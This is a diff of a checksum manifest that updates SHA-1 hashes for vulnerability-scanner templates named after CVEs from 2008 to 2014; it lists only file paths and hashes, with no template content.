+http/cves/2008/CVE-2008-1547.yaml:030465bfc9044a23c8c77a5983ec17492eda3ef8 http/cves/2008/CVE-2008-2398.yaml:f5c4cb5d6dafa0a882eae29c89bb6a3982ba69a4 http/cves/2008/CVE-2008-2650.yaml:855fa8c9bcca0355512690ec9869315ac1096d81 http/cves/2008/CVE-2008-4668.yaml:dd5527612e924d9a59ac3c58c998cacc8e70441c http/cves/2008/CVE-2008-4764.yaml:b61a8db01efa92c650b4605cabcf023653e9f153 -http/cves/2008/CVE-2008-5587.yaml:adea98e72c16a8b86d77173218168cf5a9c630ff +http/cves/2008/CVE-2008-5587.yaml:ba752a8e77010e92044b95bbba5c182fc6b57129 http/cves/2008/CVE-2008-6080.yaml:4d19f123f5d5b550ed9a60f9115032044bd3e508 http/cves/2008/CVE-2008-6172.yaml:1b69d725cbe082350970da03b78cb1ab9616ae6f http/cves/2008/CVE-2008-6222.yaml:49c094908bc759b30d38a2239f3f7a6cad5d51cb -http/cves/2008/CVE-2008-6465.yaml:9ef92fb2b872321444c23d9630a2e7c15d0966e5 +http/cves/2008/CVE-2008-6465.yaml:83637140aca3827f7add0f0feb81e661fd9f0cd9 http/cves/2008/CVE-2008-6668.yaml:9a26a2081b16686c196e3d556cd05fe9a39373d9 -http/cves/2008/CVE-2008-6982.yaml:eaed42c39192e5dc56c7751966339769d112ee3d -http/cves/2008/CVE-2008-7269.yaml:dbb30aaa7a79584c3f780968ce16dd3ff36b4e20 +http/cves/2008/CVE-2008-6982.yaml:6f398d0218d10deb69ab4e9fa933d6b7663829df +http/cves/2008/CVE-2008-7269.yaml:f2a34dba81693cc86f7c4f087f279d21bc0cd17e http/cves/2009/CVE-2009-0347.yaml:5ce90e313f49f7c658c8208dc28b030f6ad68263 http/cves/2009/CVE-2009-0545.yaml:c7f9ecbf2085e123b198011f3fd387506a9e8a71 http/cves/2009/CVE-2009-0932.yaml:6a85d3af6796f5e3dab7010769ac762444039fc1 -http/cves/2009/CVE-2009-1151.yaml:276d47a84802d93255932840fa94c5dea0cdfb87 -http/cves/2009/CVE-2009-1496.yaml:04bc77742ef20946627f2a02abbb694f7658c5e2 +http/cves/2009/CVE-2009-1151.yaml:6400c3175040c359b395e40bd9b860153316d94d +http/cves/2009/CVE-2009-1496.yaml:4199ae6be0636023b5aa3eda8934a937b93963a7 http/cves/2009/CVE-2009-1558.yaml:7311f5b1b9a9fe041ce4ffbd34daf2e6fe0e7538 -http/cves/2009/CVE-2009-1872.yaml:15f4428e5f8cdc36de49c9964025bcbc4bf7b5af +http/cves/2009/CVE-2009-1872.yaml:df8608969b8385ce660ce118fbbab4ebba7cece8 http/cves/2009/CVE-2009-2015.yaml:4694ca53378e410392946e729b2526d1220db192 http/cves/2009/CVE-2009-2100.yaml:6bbdf6cca928b966076b4cddbd0668eef5331e0a http/cves/2009/CVE-2009-3053.yaml:68a597a8292c709a6f9490f4ff1fc4e75c1ef815 http/cves/2009/CVE-2009-3318.yaml:9ff69197adddbece5877c66bf06b8db0dc809919 -http/cves/2009/CVE-2009-4202.yaml:8c8beab28cc42de1d26edc7fb12ee86ef136053c +http/cves/2009/CVE-2009-4202.yaml:290ed1e2a24fe97bfed27a92340c36e3f6fa9ca0 http/cves/2009/CVE-2009-4223.yaml:a58ac563ac596712f2eaec11206e976d07406757 http/cves/2009/CVE-2009-4679.yaml:6fc53e452071d62d54f1e77aeb36669cdab21df2 http/cves/2009/CVE-2009-5020.yaml:bd0ef8373deacb3918d2a779286f03003f4db49f -http/cves/2009/CVE-2009-5114.yaml:c81e94c486c8b9856668062ef22f809e5210851c -http/cves/2010/CVE-2010-0157.yaml:194363720489c0c2768116201c5e0e974fefd086 -http/cves/2010/CVE-2010-0219.yaml:6d32fd9490a810661cecd70c1ef75f619c3d09e0 +http/cves/2009/CVE-2009-5114.yaml:adbf420d4ca6211f83b55ef7fd8b193aecd3b989 +http/cves/2010/CVE-2010-0157.yaml:b9d78a297f70c2a6eb08a1358d62848473857718 +http/cves/2010/CVE-2010-0219.yaml:dff998254078703529896a882f9a8af773df7488 http/cves/2010/CVE-2010-0467.yaml:2a28c465b90430beaa770b63044d2bc00ca7bbc1 -http/cves/2010/CVE-2010-0696.yaml:b6d9989aba8e5757baa797341c3097a9fe77e78f +http/cves/2010/CVE-2010-0696.yaml:58aa08fd55666003ce82986f7201932da955c860 http/cves/2010/CVE-2010-0759.yaml:30831ecff561e842b6f472ea7cbb1ba54b85fa69 http/cves/2010/CVE-2010-0942.yaml:f5cbdd272685133623fd425e6d33e0fb1733e3d4 http/cves/2010/CVE-2010-0943.yaml:d1fe9d2b4e08d5ea81e894c03d11b7bcbdb73bb3 -http/cves/2010/CVE-2010-0944.yaml:201ffb5a798d6b84b5b3e420f4530ff0e756d515 +http/cves/2010/CVE-2010-0944.yaml:0b79c017413037d72bdc31dbee690f44b2d97758 http/cves/2010/CVE-2010-0972.yaml:e47087f278696e7b0e8904840e7d224727b6bf88 http/cves/2010/CVE-2010-0982.yaml:599bb1fb381fde5c20d5bcbcce1d55ba75512a52 -http/cves/2010/CVE-2010-0985.yaml:1628ee785dc09dda351edf113ab98e676386460b +http/cves/2010/CVE-2010-0985.yaml:d6d43c64b43dcb1f98a5d6b0720a107fd2e97346 http/cves/2010/CVE-2010-1056.yaml:900582497ec305ba4fca6320cfc58b4975b3d751 http/cves/2010/CVE-2010-1081.yaml:d461a69be5c5267870cc70fad2dcca1339693f1c http/cves/2010/CVE-2010-1217.yaml:65a2add18d495fa4aee30dc5d70bb31a6fc9a437 -http/cves/2010/CVE-2010-1219.yaml:2c428386556554acdb5a1e85f05ddec9fc0566f5 +http/cves/2010/CVE-2010-1219.yaml:631d0e63fe1d85e4750f4aac967b291b4286ab49 http/cves/2010/CVE-2010-1302.yaml:6ad059078eeb8d7f3bfd2aec5e71cdd7ae6f3891 http/cves/2010/CVE-2010-1304.yaml:727f1f1679c1f1973b09e11ad131f2cbb15e7dea http/cves/2010/CVE-2010-1305.yaml:67a2a340abb039bb80a8d0fdae26e297af4fefef @@ -966,37 +966,37 @@ http/cves/2010/CVE-2010-1307.yaml:e11765da3157952bceebc8445909ceee612f9279 http/cves/2010/CVE-2010-1308.yaml:7943dd6eab9e9df47150a03c293f9ebee95d49a8 http/cves/2010/CVE-2010-1312.yaml:9fd9f03506ee1c8d65629ad0f4dabd7d02ba961f http/cves/2010/CVE-2010-1313.yaml:15714bc34418e04e71c90da73b5ad0cde2f7fd86 -http/cves/2010/CVE-2010-1314.yaml:e6bdf78dda7e3556a5d74ad003586c6cc1bbb551 +http/cves/2010/CVE-2010-1314.yaml:1b35fc7fa4ae243808a6195871a473fa0d41c978 http/cves/2010/CVE-2010-1315.yaml:8ae5fb46079488101b9c5e99a775d0f97dc98883 http/cves/2010/CVE-2010-1340.yaml:0c5648a4d0daa4d1915c4403fe656fa83bcc1ccd http/cves/2010/CVE-2010-1345.yaml:4e2d3d3329776cf5b14080ac31bee840bdd22646 -http/cves/2010/CVE-2010-1352.yaml:f2a5d1ad8422b327905a7d7c8fec4d37f12439bd +http/cves/2010/CVE-2010-1352.yaml:cf760f05846ad1b4dfbae0c966d125f060e5e7bd http/cves/2010/CVE-2010-1353.yaml:4481e610c4ae85c49bdb915f28cb73819042279e http/cves/2010/CVE-2010-1354.yaml:dfd813c316d91c3f5020de9ce109a13e0c2c545e -http/cves/2010/CVE-2010-1429.yaml:7df174485a45e36b5a28b30793102c970bea397a +http/cves/2010/CVE-2010-1429.yaml:e448e9a56821ea8beb1d0c985111ac772bae76ca http/cves/2010/CVE-2010-1461.yaml:22ff8d954f8aefe76461ec1bb45a5afae27f419d http/cves/2010/CVE-2010-1469.yaml:184ebde7e35095d2bb953c855dc1ac36f1c45ab0 -http/cves/2010/CVE-2010-1470.yaml:1352ee06c702107b5c350ff4d45635b7d6aec56d +http/cves/2010/CVE-2010-1470.yaml:745a75c03fbdb3af44b911ea8c977007ceb9b885 http/cves/2010/CVE-2010-1471.yaml:e9767437cfdb3112ee0af90b66a151b7ac488f72 http/cves/2010/CVE-2010-1472.yaml:05efa0d65dfd726f7800598f8a7d6f69bdf2ac28 http/cves/2010/CVE-2010-1473.yaml:1a884946a3b1c4d2f21358885422c76e1c546bb2 http/cves/2010/CVE-2010-1474.yaml:08e6e6d4a21096f7d84d3fcc7b50a77767577217 -http/cves/2010/CVE-2010-1475.yaml:9a0fc4be309eedbfa1bea078e195580d8315b0ad +http/cves/2010/CVE-2010-1475.yaml:710bc13bcfcf5137dd31e064290ab07f7a40144a http/cves/2010/CVE-2010-1476.yaml:7890f7de322b9e0b96d7eb965cd4bdf8e7facc0e http/cves/2010/CVE-2010-1478.yaml:30788df9e30a86e49a95dbe857ba7d6f88895b35 http/cves/2010/CVE-2010-1491.yaml:81c825592c5b5b85645945be1cd9d88c4f88df9d http/cves/2010/CVE-2010-1494.yaml:8b520da8bf3985db0e217c289d806ce5fd9a2d50 http/cves/2010/CVE-2010-1495.yaml:fd08efd24fe096d136458eebabaf285744e07e0a -http/cves/2010/CVE-2010-1531.yaml:8ed70984f10bab8e6159c0e715ccdecaf46ee606 +http/cves/2010/CVE-2010-1531.yaml:9f4e27beaecc29466e0a2cabca0a7f488d51439c http/cves/2010/CVE-2010-1532.yaml:81da2999d656843c4f582b4295651a7ef0ba7dd7 http/cves/2010/CVE-2010-1533.yaml:743b6a096195b8ea287119bfd574136648f1d711 http/cves/2010/CVE-2010-1534.yaml:e56bd300d4e208ef033a7a9c0d85c99c441890e3 http/cves/2010/CVE-2010-1535.yaml:5decf50fd0a035aebb67f4bbb938af0d6a7ca136 http/cves/2010/CVE-2010-1540.yaml:eaf66df28d06a8f26b2c99f262d92b1340a42b16 http/cves/2010/CVE-2010-1586.yaml:d58c94874f5a6501a136f572f673c8b805d8ae9b -http/cves/2010/CVE-2010-1601.yaml:79949ba775daa7d9da8758347e80cf6524985fe0 +http/cves/2010/CVE-2010-1601.yaml:90ce95a80b70ffb6c0975a03865c5cf7472f155e http/cves/2010/CVE-2010-1602.yaml:0bf601a88a5f2213c172f4ff817e3bd2dc9e446d -http/cves/2010/CVE-2010-1603.yaml:bd4aad8ebb74e917c51fa68d1a8ccfe9f1f70a3b +http/cves/2010/CVE-2010-1603.yaml:d0567a3cebbeeb1977349564e575ae400548f139 http/cves/2010/CVE-2010-1607.yaml:383a5834d2af2c9e953b6656a676cc5fb5bd86ca http/cves/2010/CVE-2010-1653.yaml:461aca038a9faf55b9e4ad7c5cb8b24523f13246 http/cves/2010/CVE-2010-1657.yaml:f3040ebeda1902bdd736bebc84c3134525692228 @@ -1006,12 +1006,12 @@ http/cves/2010/CVE-2010-1714.yaml:b9fc204e8b85ee36b0f15a8da385448b2dd2fbce http/cves/2010/CVE-2010-1715.yaml:53074615708c1c4f6bf5049cf5447affe828465b http/cves/2010/CVE-2010-1717.yaml:ccf1a65be89b0c388cc9f71c28d0d6b51a17b743 http/cves/2010/CVE-2010-1718.yaml:df1c72fc97a5e4c4301b15df30b2dd19957dbc63 -http/cves/2010/CVE-2010-1719.yaml:5302d813d018de90c429483be8031c6f9cbb8f49 +http/cves/2010/CVE-2010-1719.yaml:7f4dd16cc5daa093bbaf9b6c66446bf295e182a1 http/cves/2010/CVE-2010-1722.yaml:75137a1adbb8ebcbb47642b983d93983a3f276c9 http/cves/2010/CVE-2010-1723.yaml:8b54bddf0e5f6757d1ce9cba44a93386e8ef4632 http/cves/2010/CVE-2010-1858.yaml:47fdeb1cfc6c33db3a6fbc3b6f841e5738c5524d -http/cves/2010/CVE-2010-1870.yaml:43a78570d982c16804e4d194ba483ddaf9891a7d -http/cves/2010/CVE-2010-1875.yaml:fc212ea166e32d4b166bc9a26a6ad1843cf7a999 +http/cves/2010/CVE-2010-1870.yaml:89565c3a382945d62c646978cd29fd4f0240dbcc +http/cves/2010/CVE-2010-1875.yaml:1ced221255bf17571fdd521c7cb93c810952c934 http/cves/2010/CVE-2010-1878.yaml:e376a84dae26f6d3b0cce191c22e273523736ed2 http/cves/2010/CVE-2010-1952.yaml:4c2889583512c97a6a66ec527acc778d77792240 http/cves/2010/CVE-2010-1953.yaml:e091d239b1ef9ceb20ba5d9338cbf5238491d9e6 @@ -1022,94 +1022,94 @@ http/cves/2010/CVE-2010-1957.yaml:cd4b276eb4b4fa3cbd962409f2a6d9e3d23cb8d6 http/cves/2010/CVE-2010-1977.yaml:45955fdad4bd60abfa0939a1f7ad6d64243f70d1 http/cves/2010/CVE-2010-1979.yaml:0ddddf83b9d40873443db4a31de2ebedbdc1a8bc http/cves/2010/CVE-2010-1980.yaml:d46da5ed40593b05c99310de3c3cf02b596f785c -http/cves/2010/CVE-2010-1981.yaml:f43b93dd94b21a778c95ce79f823d649ff3d0354 +http/cves/2010/CVE-2010-1981.yaml:760650ca03663f9d498f643aed4a1004be763e22 http/cves/2010/CVE-2010-1982.yaml:55fa02576aa3ae20a65183ca3186069fa806d6f8 http/cves/2010/CVE-2010-1983.yaml:d8d03db95a52020abedb493b3f4cd0050c166b3b http/cves/2010/CVE-2010-2033.yaml:6897fa1eb808a4ad1dd8f1980c3128050da1a9c6 http/cves/2010/CVE-2010-2034.yaml:ed205dcf43b360b3b9380b59380607610c6db446 -http/cves/2010/CVE-2010-2035.yaml:53e75e053b58c085708c1cdece73af273dc54f12 +http/cves/2010/CVE-2010-2035.yaml:7c031a7993ef95f34ba39b52d1a7f4e12ae45139 http/cves/2010/CVE-2010-2036.yaml:e15f376a2171fd2d2e55e99907cf7fe74244551c http/cves/2010/CVE-2010-2037.yaml:7bfb032acaab69c6117c5d8facda6543281db3d5 http/cves/2010/CVE-2010-2045.yaml:da2b1830c10d0a89cc941fe7c6b0eec0164efe12 http/cves/2010/CVE-2010-2050.yaml:2c65bfd5b4066f7e9ca8c0c4f38395a301d466c5 http/cves/2010/CVE-2010-2122.yaml:3e2a4991e90707a57e0770920aa0f55a12b5efc5 -http/cves/2010/CVE-2010-2128.yaml:3af0b3e012bf01b46103d4f69399fcf324a901f0 +http/cves/2010/CVE-2010-2128.yaml:ded24c92f66a45fc2aad2c1dce51d2544cd8db0e http/cves/2010/CVE-2010-2259.yaml:7ee9cb7d015a35ae5db7d2b21dc21eee66b1335f -http/cves/2010/CVE-2010-2307.yaml:c5b4430091826a2b0e6134f1c917f39a0fc3956f +http/cves/2010/CVE-2010-2307.yaml:9fd705ea08c126904e45fc9d28bf0e5e01802564 http/cves/2010/CVE-2010-2507.yaml:a7d4c681213119f3c275846d077e817bef44d5e6 http/cves/2010/CVE-2010-2680.yaml:abbf84831ad4ea9ed18e4185380d214afbfbde14 http/cves/2010/CVE-2010-2682.yaml:55d668ece64b7ec7b966b2979e89092420f94fa2 -http/cves/2010/CVE-2010-2857.yaml:88f7c6c2ed046efbf79a751eabf53cab0e9f4fcd -http/cves/2010/CVE-2010-2861.yaml:ef94f96f0c7193a0bf1d375b6cc65c2dad492146 +http/cves/2010/CVE-2010-2857.yaml:c0600b650e02cc9b4c54557693c7439002f3b965 +http/cves/2010/CVE-2010-2861.yaml:5846c06bf598137d7da308f7071675e0da90e316 http/cves/2010/CVE-2010-2918.yaml:fdd7c2962f11d92aefd3a974869c53ed44400ebf -http/cves/2010/CVE-2010-2920.yaml:54fd476d18b55e355baeae19b8bd01387e2e4f42 +http/cves/2010/CVE-2010-2920.yaml:d05774f5a59260cd4bd7c80695545032b2775ada http/cves/2010/CVE-2010-3203.yaml:000a8f0c4dcf829e67fe60c966debd95143f899f http/cves/2010/CVE-2010-3426.yaml:8fbd7d692e79dc4e64334f330432896ca80e1e8a http/cves/2010/CVE-2010-4231.yaml:95061e8a83ae97b5bc5f257526742084ee228267 http/cves/2010/CVE-2010-4239.yaml:70dfd38979f322a9c84edfc3f3439c7e6eaca447 http/cves/2010/CVE-2010-4282.yaml:eca8fb47c4f137ee769a8ce8170e5feea53475c0 http/cves/2010/CVE-2010-4617.yaml:890b0e647d804ad358fdfd64173d51fbbf168ef1 -http/cves/2010/CVE-2010-4719.yaml:0261ff6acbc01b1d4459620961b781b2cfb86aa8 +http/cves/2010/CVE-2010-4719.yaml:c659c9c40807dc687e48f7d7b0fb788cb1199bd2 http/cves/2010/CVE-2010-4769.yaml:d677d549a83a06d3a26b105a7f9d42161b491ca4 http/cves/2010/CVE-2010-4977.yaml:44aade6d6155014fe33a8ec57e7898212331104e http/cves/2010/CVE-2010-5028.yaml:c396646a343f1230675d7db4de16eaf675e26e7a http/cves/2010/CVE-2010-5278.yaml:4b551326a6f84dc58285d03101811b8ae002aba8 http/cves/2010/CVE-2010-5286.yaml:992dcc1f927e19df7e91041994ebba411d0c287b http/cves/2011/CVE-2011-0049.yaml:d4ae5f76935775886bf63bfac0a0ea93947e3a74 -http/cves/2011/CVE-2011-1669.yaml:122bfb098be229a5613cf020311eae4882979a6a +http/cves/2011/CVE-2011-1669.yaml:188a6d0805fabcfec5ba3e848d1eb011a3338ab3 http/cves/2011/CVE-2011-2744.yaml:e75a2a3b77597ee4b6eadb57cc5a878859099de0 http/cves/2011/CVE-2011-2780.yaml:cd61fcc85be0dd1ad856d5d42c1b0d8becf32ca5 http/cves/2011/CVE-2011-3315.yaml:a0377daef14d191981a0f569ca9c7d5816b34809 http/cves/2011/CVE-2011-4336.yaml:da0baea9d73290dee0d3ed225841560e1736a9a3 http/cves/2011/CVE-2011-4618.yaml:43b9dc16cda0cbffcc4ee7b6bfb7390ef291deae -http/cves/2011/CVE-2011-4624.yaml:3a32b317c39a2e459f72e7b824cfe9cc133278f5 -http/cves/2011/CVE-2011-4640.yaml:d8b12a71e4ea659c4c8395d3e80f7e68bf290899 +http/cves/2011/CVE-2011-4624.yaml:85aaa085fb2604d5ce9db6927520e7263d64b33b +http/cves/2011/CVE-2011-4640.yaml:cd9ac165498386ad1e03aea550fdb1c7a3dec1e5 http/cves/2011/CVE-2011-4804.yaml:5f7d69e922d525bcaed5e0f3363e99abb1742866 -http/cves/2011/CVE-2011-4926.yaml:8ecd4fbf984647488c91ceebdda0c96f4f9dfd40 +http/cves/2011/CVE-2011-4926.yaml:bf690f9d4cd731581d132457fb0a1a20b9811cc0 http/cves/2011/CVE-2011-5106.yaml:f411f9f73e789680f95b18aced081d080c822470 -http/cves/2011/CVE-2011-5107.yaml:384f8a35f24d97bb7c5e52fd3ace85e938aa6d44 -http/cves/2011/CVE-2011-5179.yaml:c1319b4ced7c9613ecf11b80224f0a4d02589bf8 -http/cves/2011/CVE-2011-5181.yaml:a79dd1f184f95395c750e3eb4babfdf01cf11d26 +http/cves/2011/CVE-2011-5107.yaml:2f069af17a480fe394ec0a8dedbcf3b4f18077bd +http/cves/2011/CVE-2011-5179.yaml:5f3b9fd65a19cb51bddcc7871bf705e984465df6 +http/cves/2011/CVE-2011-5181.yaml:aeedd9a3e30217a6ee64f4c3a4512cf5ebd6d90f http/cves/2011/CVE-2011-5252.yaml:cd6677a2e68a410e579dca0dbfb4b0f6cdd87bee -http/cves/2011/CVE-2011-5265.yaml:9883b8a3053ee209cd002e98d46409a3ab67207e -http/cves/2012/CVE-2012-0392.yaml:f29dda318dcd437bcb835ef98c66a715ed2d1d05 -http/cves/2012/CVE-2012-0394.yaml:e7585f6052afcc2a24014ecb20446b9b59cfa719 +http/cves/2011/CVE-2011-5265.yaml:aced3aeddabfffbeca73b0c57c87b7f3a23910dd +http/cves/2012/CVE-2012-0392.yaml:b52a30cfb17ee9eb84d3e8fe74c2249ef989591f +http/cves/2012/CVE-2012-0394.yaml:03ba6a4228ff69cb5ef999df7a20685e7b8f6a9b http/cves/2012/CVE-2012-0896.yaml:6498f3a54562aa157b18d08b02019ba3e358abf4 -http/cves/2012/CVE-2012-0901.yaml:7ed659172da7ff72972f14938ad31078db204bb5 +http/cves/2012/CVE-2012-0901.yaml:02cad72df636e3735401ecd3aaebab1ec1f959f4 http/cves/2012/CVE-2012-0981.yaml:4fb0cb2ce3a9d97e83dfa0d6a57bf66a7c22ea01 -http/cves/2012/CVE-2012-0991.yaml:86a2e43a7e7b407e4322b3f1b1ec3be6c3e22567 +http/cves/2012/CVE-2012-0991.yaml:7c11e9196b7e9bb2303a0748dde179b74290935c http/cves/2012/CVE-2012-0996.yaml:891c0651137f2e947c6b1b9e438cba3edb33ec77 http/cves/2012/CVE-2012-1226.yaml:3de9396fb896c545ce2f8e8a121e0203565bc963 http/cves/2012/CVE-2012-1823.yaml:da276ae6c59ea82eb9dee085c7bc8f3e6de4f7df -http/cves/2012/CVE-2012-1835.yaml:ef7c7090c9015ba56ac1dd6e9c522f264443c0ec -http/cves/2012/CVE-2012-2371.yaml:7e3b3b6140f61f065c6fb7c31ec2fcf69f56a0af -http/cves/2012/CVE-2012-3153.yaml:a979103bab4d0a56ca464505fdf3d72d5b49a56d -http/cves/2012/CVE-2012-4032.yaml:af54faeb1b7b5a0ba19ab843eee4976e6886fc11 -http/cves/2012/CVE-2012-4242.yaml:d387d7dec215be29263479571e7dad9d42195324 -http/cves/2012/CVE-2012-4253.yaml:0edf97cbecfabf09c4ca6a9467e68adb4e89ec25 -http/cves/2012/CVE-2012-4273.yaml:f768fba71858d3b55621c2a7f48e4ef4392ff4f1 +http/cves/2012/CVE-2012-1835.yaml:26a4b85001da802a08dcfa21f42fd06a4ff8dacc +http/cves/2012/CVE-2012-2371.yaml:9c6651e67d50d62f9e70e59375bd269a0ac8a486 +http/cves/2012/CVE-2012-3153.yaml:1e180980683f6003a69e11a509c210a664149f1f +http/cves/2012/CVE-2012-4032.yaml:6dbdd1abe5a02b41a5472ea0f53b16da59ea0f84 +http/cves/2012/CVE-2012-4242.yaml:1db8d950c692e36f0595c0b4b1c36d1d14c1f5dc +http/cves/2012/CVE-2012-4253.yaml:faa711598e5e3b197508c7b9dc24fa127f349b61 +http/cves/2012/CVE-2012-4273.yaml:88cd127e6579db81cb2a5ffa92fce4138730dcc9 http/cves/2012/CVE-2012-4547.yaml:b5596c4a4096d71d32c140095bcc319dfdbfa17a -http/cves/2012/CVE-2012-4768.yaml:5ccdf74af228ad6bfea89640c64850710583a945 +http/cves/2012/CVE-2012-4768.yaml:2da28c35df9803a73f1b58865851622952857059 http/cves/2012/CVE-2012-4878.yaml:1ef5a93dda472a401d0e59d4e7e8382441ef842c http/cves/2012/CVE-2012-4889.yaml:9e23549c59a9109c5c9e1a4ad29fc0537cc59037 -http/cves/2012/CVE-2012-4940.yaml:7146ba0dbf228efe43059670cdd4ad8ae53ae7c1 +http/cves/2012/CVE-2012-4940.yaml:6883f76bee0d3ba3dd36fe73dae20e366b730d26 http/cves/2012/CVE-2012-4982.yaml:fa88c9844f314ec9df1cd44e460349e3a059cc03 http/cves/2012/CVE-2012-5321.yaml:36fde02c90c4dbe92b7e3b91a097fdc47ea72622 -http/cves/2012/CVE-2012-5913.yaml:f1c3ff8cabe57d45539c3a3b07b20f89b9a89421 +http/cves/2012/CVE-2012-5913.yaml:48080cd05c20aebf7f8ed8478ab29dc339cffb48 http/cves/2012/CVE-2012-6499.yaml:ad1f16e453fb178d32bfe6d97ec0c43da94f89c5 -http/cves/2013/CVE-2013-1965.yaml:50e2b3039c13a0e7aeedb95ae11c0b143aac0c53 -http/cves/2013/CVE-2013-2248.yaml:fafdbc51610f155e845f6782a9dea0aaccd05ace -http/cves/2013/CVE-2013-2251.yaml:738e95efdaf8edb1dc662a4cec1f5b28b7b5a2ba -http/cves/2013/CVE-2013-2287.yaml:500aa8ad9cc4b23995e4ffef813941af4e966fde +http/cves/2013/CVE-2013-1965.yaml:59442dac4de8dc7d85e4d21acf0240d8521740fd +http/cves/2013/CVE-2013-2248.yaml:a2335412837c333922b314815baf00b51518fadf +http/cves/2013/CVE-2013-2251.yaml:5b84f4bf46b65f2850b271440b015852f57c7e67 +http/cves/2013/CVE-2013-2287.yaml:5245a68b158946490c02bef5066cb454f2003e92 http/cves/2013/CVE-2013-2621.yaml:b119a307b339c8bdf9fd8de85ac33095943fe5bd -http/cves/2013/CVE-2013-3526.yaml:03d663e28dfdc74ccdca26d28cf70e9e6c2427fd -http/cves/2013/CVE-2013-3827.yaml:e8ec39c341e6ead36e8d2de03a02c08df99756b1 -http/cves/2013/CVE-2013-4117.yaml:da45c051a6a735a2aa0f7576acdd9385f067a9e7 -http/cves/2013/CVE-2013-4625.yaml:6c3d257c2f145977b2b4487e9e7c328f9657aae0 +http/cves/2013/CVE-2013-3526.yaml:ac71072a5089ca2bfcb41d6944edd8047b0b17eb +http/cves/2013/CVE-2013-3827.yaml:74cb7c97fc7ac72ce3c1ad2d1d84fca1dffce1f4 +http/cves/2013/CVE-2013-4117.yaml:9aac8b4684f378b66398fced899e6bc920c2e76d +http/cves/2013/CVE-2013-4625.yaml:889425384d1791c8d64f2a01c5073faa8e752636 http/cves/2013/CVE-2013-5528.yaml:b9dd20d30e2aec7bf16c605678c6489ee1d01cea http/cves/2013/CVE-2013-5979.yaml:c1439b35c3ea1ab4d7f5ed19ccc670b75094c431 http/cves/2013/CVE-2013-6281.yaml:a8aca0c3a8f4ca7f993970d911143adde9144d8e -http/cves/2013/CVE-2013-7091.yaml:0bab2f4d7b210c62f78b5ad7ff3dde1743eab87e +http/cves/2013/CVE-2013-7091.yaml:99b3da888711a7d3490403fdf846d9df77ffc487 http/cves/2013/CVE-2013-7240.yaml:4ff6b9c5fc7d8c94d20690a220d7618948a20b86 http/cves/2013/CVE-2013-7285.yaml:b736c63de6a3a9021e2959f2758b08d4361d2dcd http/cves/2014/CVE-2014-10037.yaml:0ef395d3b049fc99af52a0d7ca44ee7d029b1048 @@ -1120,33 +1120,33 @@ http/cves/2014/CVE-2014-2383.yaml:d7ab3d6309e5ac9d06941842603e42cc5ac47e4d http/cves/2014/CVE-2014-2908.yaml:d3abb494ed31a8fe1ba4417c33341523a40a8063 http/cves/2014/CVE-2014-2962.yaml:53fac318582c4e243b9e5145fce965ed95428f90 http/cves/2014/CVE-2014-3120.yaml:852e796db8a1ff729eac94d10d725c2d92ca47d7 -http/cves/2014/CVE-2014-3206.yaml:23c5293e47729fcc8a75197777f571a2ef3a1904 -http/cves/2014/CVE-2014-3704.yaml:17386b88e3c0307c382c8068a2db3a3e1a9ea785 +http/cves/2014/CVE-2014-3206.yaml:b70331348c79e99d8844c3ce5ff2ef83bff156c9 +http/cves/2014/CVE-2014-3704.yaml:21b6ab89ca37c31b3dab4ad18a446dcfd0667724 http/cves/2014/CVE-2014-3744.yaml:8fd97d3e288c8c134d50e3b670ef5c2ee23dd8df -http/cves/2014/CVE-2014-4210.yaml:3776be1d24f6cb9defa303f35ab62751006f267d -http/cves/2014/CVE-2014-4513.yaml:fd4f4506311c47fc629d0b82b43fac746952da30 -http/cves/2014/CVE-2014-4535.yaml:081e8b92e77dfa59330e6b421ac9c3a2c9fb0797 -http/cves/2014/CVE-2014-4536.yaml:f89941018aa2ea90d816894185097dc875f7dd00 -http/cves/2014/CVE-2014-4539.yaml:5fb23d5641a7ca552a34560f1cfeb912f4846100 -http/cves/2014/CVE-2014-4544.yaml:2658ec1adfee8c0fd2aaaee7ec873812c79d183b -http/cves/2014/CVE-2014-4550.yaml:82a8887d7608ad4fc26b88d9fa9ad06e927abc93 -http/cves/2014/CVE-2014-4558.yaml:36bc6ff35d6ed975d60dbfd3ac758b692a4d0c83 -http/cves/2014/CVE-2014-4561.yaml:77e83f397ce7c91326feed1920fffc4cfd8f3a1e -http/cves/2014/CVE-2014-4592.yaml:dce16f8414cb872a0cb5ad32e9a6861a5769d9ce +http/cves/2014/CVE-2014-4210.yaml:8ec7957adfb78cbe67c0f77ac69cc3721960f789 +http/cves/2014/CVE-2014-4513.yaml:f67ad545b6d1ecd82bcc70214b52321bb1a4eea4 +http/cves/2014/CVE-2014-4535.yaml:45ead9d9374649e5264e1be566a83a140bc5421d +http/cves/2014/CVE-2014-4536.yaml:abbfc40300d117c7ecfa13deb87b3ec533d37a99 +http/cves/2014/CVE-2014-4539.yaml:17dcf6047474648112f0b52643aa7626535e8581 +http/cves/2014/CVE-2014-4544.yaml:bff41400677a95dea072646f1c0f71a18419b479 +http/cves/2014/CVE-2014-4550.yaml:df67d85d44b8cddc713ae4387fe563b518bae618 +http/cves/2014/CVE-2014-4558.yaml:babfecb9e9815ee36b5818b2597813581493ce2b +http/cves/2014/CVE-2014-4561.yaml:5451e7111c354ca486de386b140e7c41b30b14e4 +http/cves/2014/CVE-2014-4592.yaml:a6c5e83d721165e1c0cf45c68b17a78d9adbb2c6 http/cves/2014/CVE-2014-4940.yaml:136ffe1784b6c7bb206c326d2652dcdcaef7552f http/cves/2014/CVE-2014-4942.yaml:ca31e2efcd6b8e2593546a1951f70b3a0291d9b6 http/cves/2014/CVE-2014-5111.yaml:41b3e9480d86bc114cc55c99a0fbcc65563b6616 http/cves/2014/CVE-2014-5258.yaml:b25628942848bdd5962b6a5c9e52af5930597f67 -http/cves/2014/CVE-2014-5368.yaml:6d112d60b23f78a4296ce7545a6b9521facb727d +http/cves/2014/CVE-2014-5368.yaml:d31b49c1d6427dd2deec56737093b86cede9eea3 http/cves/2014/CVE-2014-6271.yaml:c336b5b85934da1f43ce4d185e09796b4fd70e4e http/cves/2014/CVE-2014-6287.yaml:3c4729bdae68ac1479d19f6720fffddbb26d262f -http/cves/2014/CVE-2014-6308.yaml:e089ead32174bf9fdb4265a2e0dd35dad2018a0e +http/cves/2014/CVE-2014-6308.yaml:54c2991a94f642fb5f45a9a90f2599ff1bfa7fa9 http/cves/2014/CVE-2014-8676.yaml:0cfe4b8a24bcb2b98dd9549cb2d1c39585200dd2 -http/cves/2014/CVE-2014-8682.yaml:f52669a4d02c8dbcbd1bc427038f39bf2ae25b86 +http/cves/2014/CVE-2014-8682.yaml:d2dcb10aefd64368ba5f837d2cdd6f3621a889da 